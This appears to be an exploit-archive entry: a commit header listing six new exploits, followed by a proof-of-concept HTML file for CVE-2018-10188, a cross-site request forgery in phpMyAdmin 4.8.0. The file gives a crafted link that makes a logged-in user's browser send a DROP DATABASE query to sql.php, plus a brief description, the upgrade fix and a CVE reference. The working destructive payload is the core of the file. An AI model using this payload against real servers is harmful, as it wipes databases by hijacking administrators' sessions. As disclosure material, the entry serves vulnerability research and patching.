082f2d1bd8
6 changes to exploits/shellcodes PRTG Network Monitor < 18.1.39.1648 - Stack Overflow (Denial of Service) phpMyAdmin 4.8.0 < 4.8.0-1 - Cross-Site Request Forgery Ncomputing vSpace Pro v10 and v11 - Directory Traversal PoC Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure Monstra cms 3.0.4 - Persitent Cross-Site Scripting
24 lines
No EOL
893 B
HTML
24 lines
No EOL
893 B
HTML
# Exploit Title: phpMyAdmin 4.8.0 < 4.8.0-1 - Cross-Site Request Forgery
|
|
# Date: 2018-04-20
|
|
# Software Link: https://www.phpmyadmin.net/
|
|
# Author: @revengsh & @0x00FI
|
|
# CVE: CVE-2018-10188
|
|
# Category: Webapps
|
|
|
|
|
|
#1. Description
|
|
#The vulnerability exists due to failure in the "/sql.php" script to properly verify the source of HTTP request.
|
|
#This Cross-Site Request Forgery (CSRF) allows an attacker to execute arbitrary SQL statement by sending a malicious request to a logged in user.
|
|
#2. Proof of Concept: This example sends HTTP GET crafted request in order to drop the specified database.
|
|
|
|
|
|
<html>
|
|
<body>
|
|
<a href="http://[HOST]/phpmyadmin/sql.php?sql_query=DROP+DATABASE+[DBNAME]">
|
|
Drop database
|
|
</a>
|
|
</body>
|
|
</html>
|
|
|
|
#3. Solution: Upgrade to phpMyAdmin 4.8.0-1 or newer.
|
|
#4. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10188 |